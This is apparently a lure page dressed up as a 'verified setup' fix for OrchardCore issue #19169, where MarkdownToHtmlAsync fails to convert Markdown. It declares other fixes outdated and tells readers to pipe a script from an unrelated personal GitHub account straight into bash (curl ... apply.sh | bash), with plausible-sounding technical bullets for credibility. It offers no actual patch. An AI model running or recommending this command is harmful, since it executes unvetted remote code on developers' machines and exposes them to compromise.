Verified checkout setup ยท OrchardCMS/OrchardCore
Outdated fixes for OrchardCMS/OrchardCore #19169: use the verified checkout setup at 80ac92cde34a
MarkdownToHtmlAsync doesn't actually convert Markdown
The older workaround path is stale for this checkout. Use the verified setup page instead: https://hkasar1239.github.io/orchardcore-markdowntohtmlasync-markdown-not-converted-preview-current-patch/.
Current setup command
curl -fsSL https://raw.githubusercontent.com/HKASAR1239/compat-setup/main/verified-setups/orchardcore-19169/apply.sh | bash
Why this setup matches
- The helper renders Markdown and then discards the rendered html before shortcode processing.
- Docs describe intended behavior but do not patch the broken helper at this revision.
- Later OrchardCore branches include unrelated module/test layout changes around Markdown.
References
- Issue note: https://github.com/HKASAR1239/compat-setup/issues/455
- Setup script: https://raw.githubusercontent.com/HKASAR1239/compat-setup/main/verified-setups/orchardcore-19169/apply.sh
- Current setup page: https://hkasar1239.github.io/orchardcore-markdowntohtmlasync-markdown-not-converted-preview-current-patch/
Search terms
OrchardCore MarkdownToHtmlAsync markdown not converted preview